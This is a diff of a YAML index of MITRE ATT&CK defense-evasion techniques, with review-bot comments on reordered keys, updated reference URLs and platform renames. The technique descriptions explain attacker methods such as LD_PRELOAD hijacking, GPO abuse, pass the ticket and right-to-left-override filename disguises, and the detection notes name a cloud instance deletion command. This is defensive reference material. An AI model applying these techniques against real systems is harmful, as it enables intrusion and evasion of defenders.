Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5482,7 +5618,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
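Review bot: the T1574.008 reference list is reordered (`Microsoft Environment Property` and `Microsoft WinExec` move up) with no change to their text, which again inflates the diff without changing meaning, since `(Citation: ...)` resolution is by `source_name`, not position. Replacing the short `http://msdn.microsoft.com/en-us/library/ms682425` style links for CreateProcess and WinExec with the canonical `learn.microsoft.com` API pages is a real improvement; the `Windows NT Command Shell` entry stays on a `docs.microsoft.com/en-us/previous-versions/` URL, which is fine as long as it still resolves.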
@@ -5575,7 +5712,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5642,12 +5778,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5683,6 +5818,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5694,16 +5833,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5739,12 +5874,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
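Review bot: the two harmj0y references move from plain `http://www.harmj0y.net/blog/...` to `https://blog.harmj0y.net/...`, so the file no longer points readers at unencrypted URLs for those posts; good. The `TechNet Group Policy Basics` entry in the same hunk keeps its `blogs.technet.microsoft.com` URL and March 2019 retrieval date; since the rest of this change re-verifies Microsoft URLs, it is worth checking that this one still resolves too.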
@@ -5752,14 +5887,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5774,6 +5908,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5782,18 +5917,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -5825,14 +5960,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -5953,7 +6085,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -6027,12 +6158,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6129,12 +6259,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -6166,11 +6295,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -6211,11 +6339,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
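Review bot: in the T1134.002 context lines the description comes through as `CreateProcessWithTokenW`, `and runas` and `.(Citation: Microsoft RunAs)` on three separate lines, which looks like inline markup being stripped by the generator and leaving its line breaks behind. Not introduced by this hunk, but worth fixing in the generator that produces this file so the description reads as one sentence.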
@@ -6271,12 +6398,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6333,7 +6459,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1218.008:
@@ -6369,7 +6494,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6402,13 +6527,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
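Review bot: after this hunk T1218.008 carries neither `spec_version` nor `x_mitre_attack_spec_version` (both lines are removed and nothing replaces them), whereas techniques with a 3.x spec version keep that field elsewhere in the patch; any consumer that reads `x_mitre_attack_spec_version` from the index now has to treat it as optional, or the generator should emit a default for records that lack it.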
@@ -6470,10 +6593,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
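Review bot: the platform list for T1548.005 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (version bumped 1.1 to 1.2), and T1070 later in the patch loses `Office 365`/`Google Workspace` for `Office Suite` the same way; anything that filters on or builds per-platform indexes from the old platform names will silently drop these techniques, so the platform list used for index generation needs updating in the same change.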
@@ -6531,7 +6653,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -6573,7 +6694,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -6632,41 +6753,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
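Review bot: the `-` block that strips `x_mitre_platforms` through `external_references` from the top of T1578.003 is a key reorder rather than a deletion, since the same fields (id, type, created, created_by_ref, external_references and the object marking) are re-emitted lower in the record in the next hunk; emitting keys in a fixed order from the generator would keep regenerations like this one reviewable instead of rewriting whole objects.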
@@ -6675,20 +6765,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
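Review bot: the `x_mitre_detection` block scalar in this hunk has hard line breaks right after `TerminateInstances` and `gcloud compute instances delete`, which look like stripped inline-code markup, and a `|-` scalar preserves them verbatim, so confirm the upstream text actually contains those breaks. The substantive changes to check amid the reorder noise are the removal of `x_mitre_permissions_required: - User`, the added contributor `Arun Seelagan, CISA`, the version bump to 1.2 and the Mandiant M-Trends 2020 URL moving from `content.fireeye.com` to the `mandiant.com` PDF.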
T1574.005:
technique:
@@ -6718,7 +6838,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -6753,8 +6873,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
@@ -6845,12 +6963,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -6858,19 +6975,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
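Review bot: the rewritten T1562.007 description ends with a trailing space inside the double-quoted scalar (`...T1499). "`), copied from the source text; harmless to YAML, but if descriptions are ever compared or hashed across regenerations it is worth trimming in the generator. The rest of the hunk is the expected upstream wording change (creation of new security groups, brute force and denial-of-service follow-ons) plus the added CISA contributor, with the detection text unchanged.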
@@ -6879,7 +7002,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -6902,9 +7025,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -6937,7 +7059,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
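Review bot: the T1036.002 description in this hunk (unchanged context) splits the RTLO examples across lines, e.g. `March 25 \u202Excod.scr` / `will display as March 25 rcs.docx`, and `\u202E` appears as a literal backslash escape inside a `|-` block scalar, where YAML does not interpret it; both are inherited from the source text, but because the block scalar preserves the line breaks, anything rendering this description will show them, so confirm they are intended before the next regeneration.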
@@ -6956,8 +7078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -6988,7 +7108,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -7018,12 +7138,10 @@ defense-evasion:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:59:22.125Z'
name: Indicator Removal on Host
description: |-
Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
@@ -7049,9 +7167,8 @@ defense-evasion:
- Windows
- Containers
- Network
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Scheduled Job: Scheduled Job Modification'
- 'File: File Modification'
@@ -7082,14 +7199,13 @@ defense-evasion:
external_id: T1070
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -7109,6 +7225,7 @@ defense-evasion:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -7116,7 +7233,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -7132,34 +7248,35 @@ defense-evasion:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
